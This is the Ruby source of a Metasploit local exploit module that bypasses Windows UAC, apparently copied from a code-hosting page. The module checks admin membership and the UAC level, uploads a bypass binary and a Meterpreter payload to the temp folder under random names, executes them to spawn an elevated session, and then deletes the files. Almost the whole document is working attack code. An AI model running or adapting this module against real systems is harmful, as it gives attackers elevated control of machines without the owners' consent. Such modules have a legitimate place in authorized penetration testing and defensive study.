Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = ExcellentRanking
8

9
  include Exploit::EXE
10
  include Post::File
11
  include Post::Windows::Priv
12
  include Post::Windows::Runas
13

14
  def initialize(info = {})
15
    super(
16
      update_info(
17
        info,
18
        'Name' => 'Windows Escalate UAC Protection Bypass',
19
        'Description' => %q{
20
          This module will bypass Windows UAC by utilizing the trusted publisher
21
          certificate through process injection. It will spawn a second shell that
22
          has the UAC flag turned off.
23
        },
24
        'License' => MSF_LICENSE,
25
        'Author' => [
26
          'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>',
27
          'mitnick',
28
          'mubix' # Port to local exploit
29
        ],
30
        'Platform' => [ 'win' ],
31
        'SessionTypes' => [ 'meterpreter' ],
32
        'Targets' => [
33
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
34
          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
35
        ],
36
        'DefaultTarget' => 0,
37
        'References' => [
38
          [ 'URL', 'http://www.trustedsec.com/december-2010/bypass-windows-uac/' ]
39
        ],
40
        'DisclosureDate' => '2010-12-31',
41
        'Compat' => {
42
          'Meterpreter' => {
43
            'Commands' => %w[
44
              stdapi_sys_process_kill
45
            ]
46
          }
47
        }
48
      )
49
    )
50

51
    register_options([
52
      OptEnum.new('TECHNIQUE', [
53
        true, 'Technique to use if UAC is turned off',
54
        'EXE', %w[PSH EXE]
55
      ]),
56
    ])
57
  end
58

59
  def check_permissions!
60
    # Check if you are an admin
61
    vprint_status('Checking admin status...')
62
    admin_group = is_in_admin_group?
63

64
    if admin_group.nil?
65
      print_error('Either whoami is not there or failed to execute')
66
      print_error('Continuing under assumption you already checked...')
67
    elsif admin_group
68
      print_good('Part of Administrators group! Continuing...')
69
    else
70
      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
71
    end
72

73
    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
74
      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
75
    end
76
  end
77

78
  def exploit
79
    validate_environment!
80

81
    case get_uac_level
82
    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
83
      fail_with(Failure::NotVulnerable,
84
                "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
85
    when UAC_DEFAULT
86
      print_good 'UAC is set to Default'
87
      print_good 'BypassUAC can bypass this setting, continuing...'
88
    when UAC_NO_PROMPT
89
      print_warning "UAC set to DoNotPrompt - using ShellExecute 'runas' method instead"
90
      runas_method
91
      return
92
    end
93

94
    check_permissions!
95

96
    upload_binaries!
97

98
    cmd = "#{path_bypass} /c #{path_payload}"
99
    # execute the payload
100
    pid = cmd_exec_get_pid(cmd)
101

102
    ::Timeout.timeout(30) do
103
      select(nil, nil, nil, 1) until session_created?
104
    end
105
    session.sys.process.kill(pid)
106
    # delete the uac bypass payload
107
    file_rm(path_bypass)
108
    file_rm("#{expand_path('%TEMP%')}\\tior.exe")
109
    cmd_exec('cmd.exe', "/c del \"#{expand_path('%TEMP%')}\\w7e*.tmp\"")
110
  end
111

112
  def path_bypass
113
    @path_bypass ||= "#{expand_path('%TEMP%')}\\#{Rex::Text.rand_text_alpha(rand(6..13))}.exe"
114
  end
115

116
  def path_payload
117
    @path_payload ||= "#{expand_path('%TEMP%')}\\#{Rex::Text.rand_text_alpha(rand(6..13))}.exe"
118
  end
119

120
  def upload_binaries!
121
    print_status('Uploaded the agent to the filesystem....')
122
    #
123
    # Generate payload and random names for upload
124
    #
125
    payload = generate_payload_exe
126

127
    # path to the bypassuac binary
128
    path = ::File.join(Msf::Config.data_directory, 'post')
129

130
    bpexe = ::File.join(path, "bypassuac-#{sysinfo['Architecture'] == ARCH_X86 ? 'x86' : 'x64'}.exe")
131

132
    print_status('Uploading the bypass UAC executable to the filesystem...')
133

134
    begin
135
      #
136
      # Upload UAC bypass to the filesystem
137
      #
138
      upload_file(path_bypass.to_s, bpexe)
139
      print_status("Meterpreter stager executable #{payload.length} bytes long being uploaded..")
140

141
      write_file(path_payload, payload)
142
    rescue ::Exception => e
143
      print_error("Error uploading file #{path_bypass}: #{e.class} #{e}")
144
      return
145
    end
146
  end
147

148
  def runas_method
149
    case datastore['TECHNIQUE']
150
    when 'PSH'
151
      # execute PSH
152
      shell_execute_psh
153
    when 'EXE'
154
      # execute EXE
155
      shell_execute_exe
156
    end
157
  end
158

159
  def validate_environment!
160
    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
161
    #
162
    # Verify use against Vista+
163
    #
164
    version = get_version_info
165
    unless version.build_number.between?(Msf::WindowsVersion::Vista_SP0, Msf::WindowsVersion::Win81)
166
      fail_with(Failure::NotVulnerable, "#{version.product_name} is not vulnerable.")
167
    end
168

169
    if is_uac_enabled?
170
      print_status 'UAC is Enabled, checking level...'
171
    elsif is_in_admin_group?
172
      fail_with(Failure::Unknown, 'UAC is disabled and we are in the admin group so something has gone wrong...')
173
    else
174
      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
175
    end
176
  end
177
end
178

179